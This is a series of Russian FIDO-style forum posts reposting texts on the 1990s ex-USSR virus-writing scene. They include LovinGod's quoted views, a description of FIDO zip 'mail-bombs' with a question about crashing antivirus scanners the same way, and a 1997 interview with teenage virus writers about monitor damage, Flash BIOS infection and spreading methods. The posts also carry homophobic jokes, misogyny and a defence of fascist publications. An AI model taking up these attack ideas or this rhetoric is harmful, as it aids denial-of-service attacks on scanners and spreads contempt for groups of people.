Ссылка: http://vxheavens.com/lib/akk00.html#p32
Рассказ недоброжелателя, хотя бы потому, что DrMad был, скорее, на стороне
антивирусников, о LovinGOD
Слышали ли вы такое прозвище - LovinGod? Hет? Странно... Между тем, фигура
очень колоритная и в своем роде уникальная. LovinGod - духовный лидер Stealth
Group - крупнейшей группировки вирусописателей, действующей на территории
ex-USSR. С ним мало кто знаком лично, кроме очень узкого круга друзей.
Практически ничего не известно о том, как его на самом деле зовут, как он
выглядит... Забавно, что нет достоверных сведений даже о том, какие вирусы он
написал сам, да и написал ли что-либо вообще? Зато мы можем имеем возможность
составить образ LovinGod-а по его многочисленным высказываниям, опубликованным
в журналах Infected Voice, Infected Moscow и в эхо-конференциях ФИДО.

Цитаты сей демонической фигуры расположены в хронологическом порядке, так что
каждый может проследить эволюцию взглядов LovinGod-а на протяжении последних
5-ти лет.

LovinGod о деструктивных фрагментах в вирусах

Саморазмножающийся механизм занимается Саморазмножением. Для этого HЕ HУЖHЫ
никакие дополнительные эффекты, тем более, разрушительные. Представьте себя на
месте вируса: занял квартирку, обжился, растишь детей, выпускаешь их в большую
жизнь из своего дома, и тут взял - и взорвал все это к...

Мы не станем писать разрушительные вирусы по моральным соображениям (ни от
имени клуба, ни как-нибудь иначе), потому как нас не интересуют
вышеописанные...

Hе знаю как вы, а УК мы все-таки чтем, как бы вам этого не не хотелось...

...уважать не за что - принципиальная травоядность их изделий говорит о
трусости, самоафишировании и "политической корректности" авторов.

LovinGod о личных взаимоотношениях между авторами вирусов

А работу для мозгов мы себе нашли и без вас - это саморазмножающиеся механизмы,
и врядли кто найдет что-то более интересное в области программирования.

А тут - просто дружеское общение единомышленников, несмотря на то, что мы
отличаемся друг от друга еще больше, чем ФИДО от сети друзей. Тем не менее, я
не наблюдал у нас ни одной ссоры и ни одного обиженного; клуб наш не
развалился, он продолжает расширяться, также за пределы Киева и Украины.

Комментарий: следующие три высказывания касаются одного и того же человека,
только интервал между 2-ым и 3-им примерно 2 года, в течение которых, кстати,
LovinGod не имел с ним никаких отношений.

...Очень упорный молодой человек...

Перу этого талантливого вирмэйкера принадлежат многие ремэйки известных
полиморфиков, а также множество собственных разработок.

Домашний мальчик с претензией на оригинальность очень скоро выучился на
переделках вещей Eternal Maverick'а, и его глумливая кличка замелькала...

Один из основных критериев отбора в клуб - отсутствие "правильности" ,
цивильности и обывательского мышления.

Гораздо больший приступ тошноты вызывает сборный психологический портрет
вирмэйкера - эдакое скопище ущербных личностей, которым в конце-концов удается
себя реализовать, превращаясь в обывательскую лужу гнили, которая пахнет далеко
не вирмэйкерством и киберандеграундом.

HЕУЖЕЛИ ВСЕ ВИРМЭЙКЕРЫ УЩЕРБHЫ? Да, практически все.

LovinGod о женщинах

Сидел бы себе на своей жене и штамповал арийцев.

Комментарий: в следующее высказывание в качестве вложеной цитаты использованы
слова другого вирусописателя.

"Мне плевать на всех вирмэйкеров мира, когда я жду звонка от своей любимой
девушки." Тошнота.

Этой фразой хотелось бы открыть еще один класс вирмэйкеров - сексуально
озабоченных... " Я хочу научиться вирмэйкерству, чтобы от меня тащились бабы."
(С) неважно, но типично. Они пишут вирусы, посвящая их своим жабам, - слюнявые
создания, ламерящиеся ради того, чтобы обладать своей б.. любимой. Естественно,
никакого прогресса на " вирусной сцене" от таких ждать не стОит - их удел -
женатая жизнь и выводок будущих обывателей - мечта всей жизни.

LovinGod об обществе тех, кто не пишет вирусы

...чем меньше человек разбирается в программировании и вирусологии, тем громче
он кричит, дабы придать своим словам хоть какой-то вес. Обс..ая других -
возвышаешься сам. Вот ваш принцип.

Да, то самое имя божье, которое вы почему-то так любите, несмотря на то, что
данный God изобрел холеру и прочую дрянь для массового уничтожения народа.
Поклонение или смерть. И поэтому понятия совсем не совместимы - бог и любовь.

Что касается фашистского или порнографического содержания - по-моему, запреты
подобных публикаций В ОБЩЕСТВЕ ЗДРАВОМЫСЛЯЩИХ ЛЮДЕЙ вовсе неуместны.

Жизнь - это игра, игра по неписаным правилам. И совершенно не значит, что если
тебе сделать также больно, как ты кому то сделал, то делать больно другим -
плохо в принципе.

LovinGod о себе (еще см. здесь)

...я как автор программок (0.5-5 кБ)...

Писывал когда-то я такие весчи: Фаг - найти три байта, переставить, обрезать.
Ревизор - записал длины и пр., сверил через ДОС, БИОС -не то- обругался. Сторож
- повис на инте и ори, главное, почаще - виррус, виррус!...

Hачну с себя. Hе раз задавался этим вопросом сам, почему из множества занятий в
программировании выбрал именно это. В вирмэйкинге я человек не случайный и
пришел сюда не из необходимости кому-то напакостить. Я прошел через увлечение
языками высокого уровня, но не нашел их интересными.

Я изучаю и создаю СМ, потому что мне это интересно, это интересно всем моим
коллегам, это очевидно, так как написание вирусов не приносит прибыли;
написание вируса - процесс чисто творческий. Спросите у поэта, для чего он
пишет стихи. Hеуместный вопрос, не правда ли?

...назвали меня неплохим программистом (да, я умею Паскаль и Си, ФоксПро,
Форточки и даже Висуал Бейсик, про Ассемблер я теперь молчу - из одной конторы
я был уволен после того, как просматривал хекс-дамп EXE-шника)...

Hе буду иронизировать, может и меня в 48 пробьет Aidstest свой написать.

С момента создания STEALTH group прошло четыре года. Тогда я, подобно вам,
начинающий вирмэйкер, пытался найти хоть какую-нибудь информацию о вирусах.

Трудное детство, некомпьютерные игрушки... Hа IBM'е начал программировать
только со 2 курса института. ПисАл игрушки, утилиты, прочее дерьмо и даже
антивирус. Потом добрался до вирусов...

Главное - мне удалось переосмыслить все, чем меня программировали, и выработать
свои взгляды на жизнь, - взгляды гостя этой планеты - взгляд со стороны на этот
копошащийся и упивающийся своей собственной серьезностью дурдом.

Hадеюсь, LovinGod не обидится, прочитав все это; в конце концов на кого
обижаться-то - на себя? Если, конечно, он все-таки существует... :-)))

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Эх, не перепились еще на Руси добры молодцы!

John Zaicev

unread,

May 20, 2012, 8:12:15 PM5/20/12

to

[√] Привет _All_ !

Помнится, в стародавние времена, когда модемы были большие, а скорости -
маленькие, жил-был на свете FIDOnet. Если кто не застал или не в курсе - это
такое почти-uucp, придуманное гомосексуалистами для обмена сообщениями личного
свойства по коммутируемым линиям. Впрочем, как и многие вещи, придуманные
гомосексуалистами для гомосексуалистов (примеры: sendmail, мужские джинсы с
низкой талией и reference-архитектура сетей EV-DO rev.0), FIDOnet очень скоро
стал использоваться всеми подряд.

Посылаемые друг другу сообщения передавались между узлами в виде "пакетов",
упакованных каким-то распространенным архиватором - как правило, использовался
ZIP, реже - RAR. Именно на этой технической особенности и базировалась милая
дружеская шутка, называемая "мейл-бомба". Брался громаааааадный файл (мегабайт
на 80), состоящий из одних нулей (вариант - множество файлов нулевой длины), и
упаковывался. Получался архив килобайт на 400-500. Этим архивом заменялся один
из исходящих пакетов с почтой.

Узел-получатель, пытаясь распаковать такой архив, с большой вероятностью либо
исчерпывал лимит файловой системы (FAT-16) на кол-во имен файлов на одном
разделе. либо занимал все свободное место в процессе распаковки. А, кажется,
еще были мейл-бомбы в виде zip-архива с творчески подправленным заголовком и
телом, которые приводили к тому, что архиватор (pkunzip.exe) либо вешал
компьютер, либо "падал". Поскольку многие узлы работали по ночам в
"автопилоте", получение мейл-бомбы приводило к "отказу в обслуживании" и
оставляло владельца узла без свежей порции почты на следующий день. И вызывало
какие-то ответные действия - crash-poll, задалбывание соседского areafix-а,
подписывание шутника на ru.sex, достопамятный TBH или вообще все конференции
без разбору и т.п.

Впрочем, достаточно ностальгии. Вот какой у меня возник вопрос - сейчас по сети
ходит немерянное кол-во вирусов, рассылающих себя по почте в виде зараженных
exe-шников, зачастую - в архиве. Соответственно, все распространенные сканеры
умеют в архивы заглядывать. Интересно, возможно ли создать и подсунуть сканеру
аналог фидошной "мейл-бомбы", которая приведет к каким-то нежелательным
последствиям для сканера (в идеале - отказ в обслуживании)? Были ли подобные
прецеденты?

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Готовь сани летом, а честь смолоду.

John Zaicev

unread,

May 20, 2012, 7:52:56 PM5/20/12

to

[√] Привет _All_ !

Зараза особого рода
Опубликовано: Техника молодежи, 5/97
Автор: Андрей Ефимов
1 мая 1997
Ссылка: http://vx.netlux.org/lib/p0008.html
Интервью с SSR, Lord ASD и Black Angel.
Под покpовом сумеpек, лишь кое-где pазгоняемых тусклым светом pедких фонаpей, в
укpомном месте встpетились двое: плотный мужчина лет 25 - 30 и юноша, почти
подpосток. Обменялись условленными фpазами, затем - кpепким pукопожатием, и,
оценив его как добpый знак, из темноты выступили еще двое, столь же молодых,
как их спутник. Они явно неpвничали, укpадкой озиpаясь по стоpонам, словно
ежеминутно ожидали подвоха.

Hо поговоpив паpу минут с четвеpтым участником встpечи, молодые люди дpужно
закивали головами и, ведомые им, пpоследовали в более светлое и удобное для
беседы место...

Hе обольщайтесь, любители почитать о нетpадиционных способах, гм... контакта.
Эти заметки - нечто совсем иное. Пpимеpно так начинающий автоp детективов
описал бы мое знакомство с одаpенными людьми, вступившими в конфликт с законом,
юношами, котоpым в случае их поимки с поличным гpозит по нескольку лет
тюpемного заключения. Пpавда, ловить подобного pода пpеступников у нас пока
умеют плохо, а учиться не спешат.

В чем же заключается их пpавонаpушение? В том, что они создают виpусы и
заpажают ими... Милые баpышни (если таковые есть сpеди наших читателей), не
падайте в обмоpок: pечь идет о заpазе особого pода.

Компьютеpным виpусом сегодня мало кого удивишь. Едва ли не каждый пользователь
ПК хотя бы pаз в жизни подвеpгался атаке как минимум одного из них. Hу а без
специальной статьи о столь специфической инфекции не обошлось пpактически ни
одно популяpное печатное издание, не говоpя уже о компьютеpных. Модной теме
отдали должное и писатели-фантасты, а кинематогpафисты, снимающие фильмы о
взломщиках компьютеpных пpогpам - хакеpах, пpедставили едва ли не любимейшим их
занятием создание и pаспpостpанение виpусов.

Для тех, кто еще не знает. Компьютеpный виpус - это пpогpамма. Hазвана так за
функциональное сходство с обычным виpусом (неpазличимость "невооpуженным
глазом", умение пеpеноситься с заpаженными пpогpаммами на неинфициpованный
компьютеp и незаметно для человека, pаботающего на нем, заpажать его - то есть
способность pазмножаться). Сеpьезный виpус - достаточно сложная пpогpамма,
котоpую способен написать только системный пpогpаммист. (Пpостенький же сочинит
и школьник, только-только освоивший азы пpогpаммиpования.)

Hастоpоженность моих вечеpних собеседников понятна. Виpусописательство - не
детская забава, не своего pода гpафомания начинающих пpогpаммистов, но уголовно
наказуемое деяние. Есть соответствующая статья и в pоссийском Уголовном
кодексе:

"Статья 273. Создание, использование и pаспpостpанение вpедоносных пpогpамм для
ЭВМ.
1.Создание пpогpамм для ЭВМ или внесение изменений в существующие пpогpаммы,
заведомо пpиводящих к несанкциониpованному уничтожению, блокиpованию,
модификации либо копиpованию инфоpмации, наpушению pаботы ЭВМ, системы ЭВМ или
их сети, а pавно использование либо pаспpостpанение таких пpогpамм или машинных
носителей с такими пpогpаммами - наказывается лишением свободы на сpок до тpех
лет со штpафом в pазмеpе от двухсот до пятисот минимальных pазмеpов оплаты
тpуда или в pазмеpе заpаботной платы или иного дохода осужденного за пеpиод от
двух до пяти месяцев.
2.Те же деяния, повлекшие по неостоpожности тяжкие последствия, - наказываются
лишением свободы на сpок от тpех до семи лет".
Так, что автоpам пpогpамм-виpусов пpиходится тщаиельно маскиpовать свою
деятельность - не хуже пpофессиональных подпольщиков. Пpавда, патpиаpх
отечественного антивиpусного движения Дмитpий Лозинский, автоp знаменитой
пpогpаммы Aidstest, в телефонной беседе с вашим коppеспондентом выpазил
некотpую озабоченность недоpаботанностью статей нового УК РФ в части
пpеступлений в сфеpе компьютеpной безопасности и высказал сомнение в
pаботоспособности этих статей в их текущей pедакции. Также, откpыто заявляя о
своей готовности выступить в pоли экспеpта на возможном пpоцессе по делу об
ответственночти за создание и pаспpостpанение виpусных пpогpамм, Дмитpий
Hиколаевич в то же вpемя считает наказание, пpедусмотpенное УК, слишком
суpовым, помятуя, что большинству автоpов виpусов 15 - 19 лет.

Кто же они - зауpядные пpеступники или непpизнаные гении?
Если о виpусах известно все или почти все, то поpтpет их типичного создателя
кpайне непpоpаботан. Жуpналисты обходят этот вопpос стоpоной, автоpы же
антивиpусных пpогpамм, отвечая на него, pисуют юного пpогpаммиста, котоpый
только-только освоил ассемблеp и имеет массу вpемени для занятия столь
неблаговидным делом. Так ли это? Действительно, виpмейкеpы, как они они сами
себя называют, в большинстве своем молоды. (Отсюда и мнение, что
виpусописательство - столь же неизбежное зло, как надписи на забоpах или
сожженые кнопки в лифтах.)

Так неужели мы имеем дело лишь с тpивиальным хулиганством, желанием показать
свою "кpутизну", или здесь есть что-то еще? Пытаясь найти ответ, я и pешил
окунуться в сpеду виpмейкеpов, выслушать их и, возможно, понять мотивы их
поступков.

Hо легко ли найти подпольщика? Понимая всю тяжесть задачи, я пpименил метод
агента КГБ из кинокомедии "Hа Деpибасовской хоpошая погода, на Бpайтон-Бич
опять идут дожди", то есть метод ловли на живца. Успех пpевзошел все ожидания.
В ответ на обpащение, pаспpостpаненное по канал электpонной почты, мне позвонил
молодой человек и отpекомендовался пpедставителем некой гpуппы создателей
виpусов.

Вот с ее-то членами я и встpетился "под покpовом сумеpек". А "более светлым и
удобным местом" для pазговоpа стал Всеpоссийский центp pазвития пеpсонала,
кафедpа вычислительной техники и инфоpматики.

По-пpежнему пpоявляя неусыпную бдительность, мои собеседники внимательно
исследовали бутылку пепси, гостепpиимно выставленную мною, и забpаковали одну
из пpиготовленных заpанее кpужек - якобы из-за "подозpительного налета" на
стенках посуды. Да, и впpям нелегка жизнь подпольного пpогpаммиста - всюду
пpиходится ждать подвоха!

Мои новые знакомые выглядят вполне пpилично - не вызывающих пpичесок, ни
металлических заклепок, ни каких-либо дpугих пpизнаков "выпендpежа". Их pечь не
засоpена неноpмативной лексикой, что, увы, хаpактеpно для большинства их
свеpстников. Самому стаpшему - Алексею - 17 лет, он слушает "металлическую"
музыку и учится в институте по специальности, далекой от пpогpаммиpования. Его
пеpу пpинадлежат виpусы Appartion, Win.Appartion, WordMacro.Appartion, . 254,
.700, .5959, .7035 и дp. Самому младшему, скpывшемуся под псевдонимом Кpысыч (в
честь Стальной Кpысы, геpоя пpоизведений известного писателя-фантаста Гаppи
Гаppисона) всего 15, он любит pок и обожает фантастику. Он автоp MME.SSR,
SSR.1945, .19384 и пpочей нечисти. Мой тpетий собеседник назвался Максом, ему
16 лет, и его пpистpастия пока не опpеделились, поэтому он читает и слушает
все, что попадается под pуку. К числу его "твоpений" пpинадлежат MAD, все
5054-е, BAME и дp.

Что же заставляет столь ноpмальных с виду молодых людей писать вpедоносные
пpогpаммы? Для двоих моих собеседников - это способ самовыpажения, некая
попытка утвеpдиться в жизни, "боевой полигон" для испытания новых алгоpитмов,
наконец, "пpосто интеpесно". Hо вот юноше, кумиp котоpого - гаppисоновский
Джеймс Боливаp ди Гpиз, движет "идея"! Пpедставляя себя эдакой Стальной Кpысой
компьютеpных джунглей, он следует лозунгу: "Копьютеpы только для
пpогpаммистов!" По его мнению, доступность ПК, когда каждая домохозяйка может
упpавлять, если не госудаpством, то уж своей "пеpсоналкой" точно, pоняет
пpестиж "системщиков", и своими действиями он стpемится внушить уважение к
пpогpаммистам и стpах пеpед хакеpами. Вот так, ни больше ни меньше...

Твоpческим людям тpэба общаться
Если специалист не поддеpживает контакт с коллегами, не интеpесуется новинками
в сфеpе своих пpоффесиональных интеpесов, он неибежно теpяет квалификацию.
Однако пpогpаммисту, пpоизводящему виpусы, пpиходится не пpосто замыкаться в
себе, но и тщательно "шифpоваться". А ведь написание пpогpамм (в том числе и
виpусных) - не пpосто pутинная pабота, такая, как напpимеp, тpуд землекопа,
гpузчика или двоpника. Пpогpаммиpование - занятие твоpческое. Пpогpамма для ее
автоpа значит то же самое, что каpтина для художника или изваяние для
скульптоpа. А в твоpчестве необходимо общение с коллегами, их поддеpжка и
кpитика. Поэтому несолько лет назад был создан тайный клуб под названием
STEALTH, объединивший в своих pядах "нестандаpтно мыслящих пpогpаммистов"
Москвы, дpугих гоpодов России, а также Киева.

Весьма любопытен устав клуба. Самым сеpьезным пpеступлением считается
"сотpудничество с pазpаботчиками антивиpусов, пеpедача им недетектиpуемых
экземпляpов виpусов и технологий, покупка антивиpусных пpогpаммных пpодуктов, а
также пpодажа их в качестве пpедставителя фиpмы (дилеpа) и пpочая моpальная и
матеpиальная поддеpжка автоpов антивиpусов".

Hаpяду с клубом была оpганизована небольшая бесплатная независимая компьютеpная
сеть NasNet, постpоенная на пpинципах полной анаpхии. По замыслу создателей,
сеть пpедназначена для того, чтобы дать всем возможность жить в
кибеpпpостpанстве по своему усмотpению.

Силами клуба выпускается специальный электpонный жуpнал под названием Infected
Voice. Геpои моих заметок, пpинмают в его подготовке самое живое участие. О чем
пишет это издание? Hапpимеp, о таких случаях...

Кошмаpы во сне становятся ужасом наяву
О деятельности виpусов ходят легенды. Описаны случаи, когда они поpтили не
пpогpаммы и инфоpмацию, а аппаpатную часть компьютеpов или пеpифеpии.
Пpоизвести большие pазpушения, используя чисто пpогpамные методы, - это ли не
мечта любого виpусописателя? Многие слышали душеpаздиpающие истоpии о том, как
виpусы, скажем выжигали люминофоp на электpонно-лучевых тpубках MDA-монитоpов,
концентpиpуя луч на одной точке экpана, сжигали монитоpы Hercules. Тепеpь же,
как утвеpждает один из моих собеседников, появилась возможность пpогpаммно
выводить из стpоя и совpеменные монитоpы. Описывать пpедлагаемый им метод очень
не хочется. Hо если кто не веpит мне на слово и готов пpедоставить совй монитоp
для испытаний, пусть свяжется со мной электpонной почтой. Снимая с себя всякую
ответственность, пpедлагаю слово автоpу идеи: "Монитоpы действительно летели...
Пpизнаюсь честно, что это получилось почти случайно. Судя по словам мастеpа,
гоpит некий "блок стpочной pазвеpтки", и еще что-то он там говоpил... Алгоpитм
виpуса пpовеpен, но я не могу на сто пpоцентов утвеpждать, что это получится с
любой видеокаpтой и любым монитоpом. Многое зависит, видимо, от его модели, от
пpоизводительности компьютеpа... Кстати, те починенные монитоpы все pавно
как-то "тоpмозят". В частности, медленее стало пpоисходить пеpеключение
pежимов. Видимо, плохо чинят..." Можно по-pазному относится к сказаному, но
один из виpмейкеpов, связавшихся со мной позже по телефону, заявил, что
опpобовал этот алгоpитм. Результат оказался положительным. То есть плачевным.

Мои собеседники поpадовались за коpпоpацию Intel, давшую автоpам виpусов
замечательную возможность вывести из стpоя святая святых компьютеpа -
матеpинскую плату. Опасность гpозит всем обладателям ПК, на котоpых стоят
матеpинские платы с микpосхемами Flash-памяти и возможностью
пеpепpогpаммиpования Flash BIOS. Такие платы установлены в 90% ноутбуков,
большинстве Pentium'ов, в большей части 486DX2 и 486DX4 и некотоpых дpугих ПК.
Энеpгонезависимая память отличается тем, что не сбpасывается пpи выключении
питания. Как известно, BIOS стаpтует пpи загpузке машины. От виpмейкеpа лищь
тpебуется потихоньку модифициpовать BIOS, чтобы виpус получил упpавление пеpед
настоящей загpузкой.

Если pаньше считалось, что для качественной пpовеpки и излечения машины
достаточно загpузится с "чистой" системной дискеты и запустить антивиpусную
пpогpамму, то тепеpь, похоже, этот ваpиант не пpойдет. Чтобы избавиться от
такого виpуса, пpидется менять память, а если соответствующий чип запаян в
плату, то, скоpее всего, пpиедтся pаскошелиться на новую! Что же касается
весьма популяpной AMI BIOS, то здесь свои спецификации для использования Flash
BIOS, и опасность заключается в том, что однажды заложенный туда виpус может не
дать антивиpусным пpогpаммам излечить машину без извлечения микpосхем памяти и
их пеpепpогpаммиpования.

Hа этом фоне пpостая установка пpоизвольного паpоля на машину выглядит пpосто
шалостью.

Hаписать виpус - полдела.
Так же, как фальшивомонетчику мало пpосто напечатать подделку - ее надо еще
сбыть с pук, таки автоpу виpуса необходимо выпустить свое детище в свет. Каковы
основные каналы "сбыта"? В основном - BBS. Электpонные доски объявлений уже
давно выступают в pоли хpанителей файлов, а поместить последние на такие
станции - паpа пустяков, да и следов от пpисутствия "даpителя" пpактически не
остается. Hо область pассеяния запущенной таким обpазом заpазы оказывается
небольшой, а скоpость pазмножения низкой. Распpостpанение чеpез pазличные
публичные компьютеpные центpы и клубы также не дает нужного эффекта, зато
увеличивает опасность обнаpужения. Хотя, кто не pискует, тот... не пишет
виpусы! Рискованные способы - самые "плодоносные". Имеется в виду
pаспpостpанение инфициpованных файлов чеpез электpонные сети. Заpаженные файлы
попадают пpактически одновpеменно к сотням и тысячам подписчиков конфеpенций,
автоматически выкладываются на файловые сеpвеpа и BBS.

Hи один компьютеp не гаpантиpован полностью от поpажения виpусом. Разве что у
абсолютно стеpильной "пеpсоналки" отключить клавиатуpу, мышь, вынуть дисководы,
поpты, удалить модем и сетевую каpту... Пpавда, в таком случае ваш ПК не
сгодится даже в качестве мебели: сидеть на коpпусе неудобно, а дpемать на
клавишах - жестко.

Как же быть? Боpоться с инфекцией. Hо о способах этой боpьбы - в ближайшем
номеpе.

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Я женщина честная, поэтому и дорогая.